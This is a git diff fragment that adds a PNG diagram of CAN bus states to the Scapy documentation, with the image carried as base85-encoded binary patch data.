zdm|2QZf=SRQaASW7=G5sNM>#lTl%_5HwW?P>|c6xpVB2TS&;<53~t*ai@>xZ!xDbU zlfWHkxtLEV@v(;fLuP|iRj**Hd>O_EKkvVKdEr}l1(tWLE?Syyj?Mq6JW1c+orqb} zQ7*0^cnSj6afRR%-B9EGl6;`)GvwL4%7i?oR$HZx^nwD&|?sjOYT9}xIs z@acJ?ac8(u!z8A&mxkc_tf+#J-Z@g-c|2PgD^qDv&T}o;6PAh$jz_#H<#4M;_QJ& zce+0e9%G;EE2k&kD6BpGh9>Bv>(}|-=|4a7Om>5mLIMSJY>hCCeSphKxc(EGN%e)< z-!KmdpFf9cFL^*tN)W-M(W_)fLee92oMidTgP@ ztn(7hKJZ<|W_wHYKX=t)?ne(JvBh`+}o;eihv+xig+;-zT7=b4VD zkmeH@i5?kga(?MVkT{SRM&cK4Yd4tf+%4gO*vy|6evquFVyft#R|KhF%cn92cMGhBM zg9AyUi|?&_^>DyG^R`bp$O5-M)jjLPR@yq{+3zv$yXM$Dw-!f!&e|}9p32Y4Ud!`C z_6zv()#ei#1Vq_J8M8BUAb+!?=IFuY*esHi?oBz{JOtWCPtKh7SST(iI0AmY82eFq zuWCb?F`glw1(Qk)o)9nZG<-O%hRdJmkKR(KVvf3tuPErQ<^%Tc=wUV;2D7;%Itg*d zVSn|`(F+(82ru!`KY%TGVDUQjWr8!akLG$Nr@#jR)q`0S1EQT!{jMDwN7%Kh|L0Ft zIdswLs~7Ys#|c%!-qCp1UF{hBeXkvf6&Ak`7r^8mjZln-JWpRaK!wZeOMGH5zqY#e z?zLy!b^Co^MvP2HoS`DpI8b3>3{8=QiZhy*=IagB_c4>bz-B!Yd1l}_NU~M6l`V=C zr4NyokIJC3Mj?@Xc$!p;-KxZHsif04A_;g%CMskJUYBz*cRelzhACh<5Z6uqI?l@h zns7TT>+MFERzjE?IbYv?zkK}oF=USfJbzv~786*HUW@y|pJD^B=jK|YW#&wYjRh_O z@CzjGEvvNDXc37d3_fMU9su(iNj&UeX1ZVk;oeqo5{HRAT;fIt!?l>;=g$Fe0oWyN z;kke*WZwa%V(jj|aTU`C#_I@+f;*5gxMjEtGI-%^+DX|5?b(OP;jX(T!ZX{_;&@=xVvz4LyLLhXKnJb8(vfT%+y`A^D8qG5j;)AeO#OTN|-HDYwYYSZ2Lw3JB(-9LB^N7kzZQM4T)Ds zF12$!we1B^jfj0y;JKdd^g;?OGk(b9vRj$_?IrSQDH=k~W1TTlewqq;!JSr@q@>t^ z=^L!>;1>PJVTp<38zPhhWY@c(NMBl7IStBPKk{wl;Qf?Q$|e6f}_s9Kd88 z0*2ql{tRw>HOzJ8Gx)}Xfjwy zT5}Z2DN#p)i$L=5;@X)PL^ zckC%;CKU%YU`gCOJoO%|WtAP5>WG^qe!D#joeZ&S*LA%gajN+He^bLXf6kb)mErau zT9AlRJ4GWh|IIp|R}g>Z#b4%kXWq03P=Ifj1X^-JgKbF{ozrV5#`#RUN|`EIVR z=YAc?PG4d=RknGv*-?(wbchq>gS|Y?+>!XJ)k#)8h6;PpYPHW!D*D;xrU#AMTz^Te z!NJ#y^A26SgNIl4opd&IFOketZ5|fIw&$U<_7T@PeA@D41FW$3BTioSM4>#7eE82@ zE=BM4$^WF9pw6E9J7MSf-&s6-ivP*id9s`Im&>;Q*uM|{MT&pP^Dk5Eu!8)*XXal? hvBL`gkIKg?jGpn>auJCeYPF(J*8nNbP`u~+zW^uf>D~YU literal 0 HcmV?d00001 diff --git a/doc/scapy/graphics/automotive/can-bus-states.png b/doc/scapy/graphics/automotive/can-bus-states.png new file mode 100644 index 0000000000000000000000000000000000000000..389a00766ff11c6c85ba52a9c122b5fb66449df0 GIT binary patch literal 132143 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 